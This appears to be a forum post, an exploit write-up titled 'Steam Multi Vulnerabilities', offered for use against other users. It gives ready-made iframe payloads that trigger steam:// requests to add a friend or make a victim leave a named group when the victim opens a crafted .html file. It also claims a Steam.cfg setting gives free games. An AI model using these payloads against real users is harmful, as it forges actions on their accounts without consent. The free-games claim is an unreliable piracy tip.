+==================================+
| |
| Steam Multi Vulnerabilities |
| |
| |
| By Sh0ck (shock@k.st) |
| |
| |
+==================================+
[hide=10][code]
I, Iframe exploit (Seasurf) :
When you go on steam's friend profil, you have the choice :
- Add to your friends list.
Like this url : http://steamcommunity.com/id/shocknsl/
When you click on the link for add your friend, an request is executed :
steam://friends/add/76561197960383657
This request add your friend to your friends list.
Exploitation :
In a .html file, you can make an iframe with this request :
<iframe src="steam://friends/add/76561197960383657"></iframe>
In while.
When you send the link of your .html file to your contact, if he have steam open, it's the crash.
II, Second Iframe exploit (Seasurf) :
When you quit a group on steam, you have like request :
steam://groups/leave/nameofthegroup
Exploitation :
Like the friends iframe, <iframe src="steam://groups/leave/nameofthegroupofyourcontact"></iframe>
If he have a group named "Headshot" for example :
<iframe src="steam://groups/leave/Headshot"></iframe>
Send the malicious .html to your contact and he not lucky if he click on your link :/
III, Steam.cfg exploit :
- Quit your steam application completely.
In your steam repertory : C:\Program Files\Steam
Create a Steam.cfg with like text :
BootStrapperInhibitAll=enable
Now, save your file and launch steam, you have many games for free.
Greetz : Xylitol, Yacodo, HuGe, p3lo, ZeQ3uL, SpY-TecH, NoXo, KPCR, t0fx,
Reply With Quote
